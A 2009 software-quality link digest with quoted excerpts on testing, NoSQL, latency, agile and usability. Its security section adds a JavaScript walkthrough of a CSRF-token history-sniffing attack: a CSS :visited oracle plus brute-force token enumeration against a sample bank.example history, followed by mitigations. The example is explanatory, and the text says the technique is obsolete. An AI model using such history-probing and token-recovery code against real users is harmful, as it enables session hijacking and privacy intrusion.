Software Quality Digest – 2009-07-27
By Tobias Gurock, July 27th, 2009
The Software Quality Digest with the latest articles, blog postings and discussions about software quality, testing, usability, accessibility, scalability and related topics of the past two weeks. If you have a relevant link for the Software Quality Digest, please let us know and we would be happy to include it in the next digest.
Software Quality and Testing
- Software Engineering: Dead? – “And yet, it’s also a release. It’s as if a crushing weight has been lifted from my chest. I can publicly acknowledge what I’ve slowly, gradually realized over the last 5 to 10 years of my career as a software developer: what we do is craftsmanship, not engineering. And I can say this proudly, unashamedly, with nary a shred of self-doubt.”
- The four essential laws of software updates – “Automatic updates are becoming more and more common, which is a good thing. They save us time and hassle: instead of finagling with installers, we can just sit back, relax, and let all our programs do the work for us. Oh, if only it were that easy.”
- Good Lazy and Bad Lazy – “Something which I’ve come to realise more recently is that it’s not necessarily true that being lazy as a developer is always a good thing – it depends in what way you are being lazy because there are certainly good and bad ways in which you can express your laziness!”
- Book Review: The Art of Unit Testing – “Given my personal commitment to software quality through testing, I was excited to get my hands on a copy of Roy Osherove’s The Art of Unit Testing from Manning. A few weeks ago our copy was delivered and I have been excited for an upcoming vacation which would give me the time to sit down and churn through the book.”
Performance and Scalability
- My Thoughts on NoSQL – “In the late nineties and early thousands, websites were mostly read-only–a publisher would create some content and users would consume that content. [..] And with that fundamental shift away from read-heavy architectures to read/write and write-heavy architectures, a lot of the way that we think about storing and retrieving data needed to change.”
- Latency is Everywhere and it Costs You Sales – How to Crush it – “Latency matters. Amazon found every 100ms of latency cost them 1% in sales. Google found an extra .5 seconds in search page generation time dropped traffic by 20%. A broker could lose $4 million in revenues per millisecond if their electronic trading platform is 5 milliseconds behind the competition.”
- Scalability issues for dummies – “Every once in a while I get people asking me what’s taking me so long to open my startup Inkzee to the public. They also ask me what exactly I have been doing, as the web seems exactly the same. I normally answer that things aren’t easy, that it takes time, especially if you are alone, like I am. After a while I end up explaining my problems with scalability and that’s the point where people just can’t follow you. I’m going to explain here what scalability problems are and how deep the repercussions are for a small company.”
Process and Methodology
- Considering Agile, deciding against it – “Some time ago, while managing a distributed software project, I spoke to a developer who was thinking about joining our team. This individual was a big proponent of Agile development. When he found out that in our particular project we were not using an Agile development model, he began to lose interest. He compared my position there to the position of the Tom Smykowski character from the movie Office Space.”
- Planning for Feature-Complete Deadlines – “Planning to catch a plane is a perfect example of risk management for contained change: problems are expected, but they usually fall within a range you can still make an estimate of. (I wrote about this in my post The Three Types of Change.) Using experience I can make a probabilistic forecast of the time required to catch the plane. It will take two hours at the least to be there on time. But when Murphy’s Law hits me (and it usually does in some way) it could be anywhere up to four hours.”
Usability and Accessibility
- Mobile Usability – “When designing for mobile, there’s a tension between (a) making content and navigation salient so that people do not work too hard to get there, and (b) designing for a small screen and for slow downloading speeds. That’s why almost every design decision must be made in the context of the site being designed, and what works for a site may not work for another.”
- The Inclusion Principle – “Affordance allows us to look at something and intuitively understand how to interact with it. For example, when we see a small button next to a door, we know we should push it with a finger. Convention tells us it will make a sound, notifying the homeowner that someone is at the door. This concept transfers to the virtual environment: when we see a 3D-shaped button on a web page, we understand that we are supposed to “push” it with a mouse-click.”
- Reinventing the desktop (for real this time) – Part 1 – “Since the 1980s, this functionality has been presented to users on most systems with only minor variations upon the standard WIMP (Window, Icons, Menu, Pointer) model handed down from Xerox PARC and the first Mac, so, obviously, the modern desktop is not really broken: people have been getting by with essentially the same design for decades now. Still, there is a perennial longing for something better, so the question is what motivates this feeling?”
Security
- Hacking CSRF Tokens using CSS History Hack – “In this exploit, we discover the CSRF token by brute-forcing the various set of URLs in browser history. We will try to embed different CSRF token values as part of the URL and check if the user has visited that URL. If yes, there is a good chance that the user is either using the same CSRF token in the current active session or might have used that token in a previous session. Once we have a list of all such tokens, we can just try our CSRF attack on the server using that small list.”
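The quoted article describes the attack in prose; the following is an added example (not code from the linked article or from this blog) that makes the two moving parts explicit: a candidate list of token values embedded into URLs, and a history oracle that says whether the victim’s browser has visited a given URL. The host `bank.example`, the query parameter name `csrf` and the four-digit token format are assumptions chosen for illustration. The CSS `:visited` oracle is included as it was written in 2009 and runs only in a browser; since about 2011 browsers restrict what `:visited` styling can reveal to `getComputedStyle()`, so that probe no longer works on current browsers. The attack logic itself is exercised offline against a constructed history.

```javascript
// Added example: CSRF-token recovery via a browser-history oracle.
// Not code from the linked article. Host, parameter name and token format
// are assumptions for illustration only.

// Every URL the victim would have visited if `token` had been carried in the
// query string. The attacker must know the exact URL shape for the match to work.
function buildCandidateUrls(baseUrl, paramName, tokenGuesses) {
  return tokenGuesses.map((token) => {
    const u = new URL(baseUrl);
    u.searchParams.set(paramName, token);
    return { token, url: u.toString() };
  });
}

// Reduce the guess space to the tokens the oracle confirms as visited.
// The returned list is the "small list" the article then replays against the server.
function recoverTokens(baseUrl, paramName, tokenGuesses, isVisited) {
  return buildCandidateUrls(baseUrl, paramName, tokenGuesses)
    .filter(({ url }) => isVisited(url))
    .map(({ token }) => token);
}

// The 2009-era oracle: style :visited links and read the computed colour back.
// Browser-only (needs a DOM); kept to show what the article relied on. Modern
// browsers return the unvisited colour here regardless of history.
function makeCssHistoryOracle(doc) {
  const style = doc.createElement('style');
  style.textContent = 'a.probe:visited { color: rgb(255, 0, 0); }';
  doc.head.appendChild(style);
  return function isVisited(url) {
    const a = doc.createElement('a');
    a.className = 'probe';
    a.href = url;
    doc.body.appendChild(a);
    const visited =
      doc.defaultView.getComputedStyle(a).color === 'rgb(255, 0, 0)';
    a.remove();
    return visited;
  };
}

// Offline stand-in for the victim's history: an oracle backed by a Set of
// normalized URL strings. Lets the filtering logic run under Node for the demo.
function makeSetOracle(visitedUrls) {
  const normalized = new Set(visitedUrls.map((u) => new URL(u).toString()));
  return (url) => normalized.has(new URL(url).toString());
}

// Full guess space for a zero-padded numeric token of `digits` digits.
// A four-digit token is 10,000 candidates: trivially enumerable, which is the
// point of the attack; a 128-bit random token is not.
function numericTokenSpace(digits) {
  const count = 10 ** digits;
  const out = new Array(count);
  for (let i = 0; i < count; i++) out[i] = String(i).padStart(digits, '0');
  return out;
}

// Constructed sample history (assumption): the application put a short,
// reused token in GET links, so two earlier sessions' tokens are recoverable.
const SAMPLE_HISTORY = [
  'https://bank.example/transfer?csrf=0042',
  'https://news.example/article/17',
  'https://bank.example/transfer?csrf=7731',
];

// Run the attack against the constructed history.
function demo() {
  return recoverTokens(
    'https://bank.example/transfer',
    'csrf',
    numericTokenSpace(4),
    makeSetOracle(SAMPLE_HISTORY),
  );
}

// demo() → ['0042', '7731']
```

The example also shows what removes the attack surface on the application side: the oracle only ever answers "was this exact URL visited", so tokens that never appear in a URL (sent in a POST body or a custom header) and tokens that are unguessable (long, random, and rotated per session) leave nothing for the history probe to confirm.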
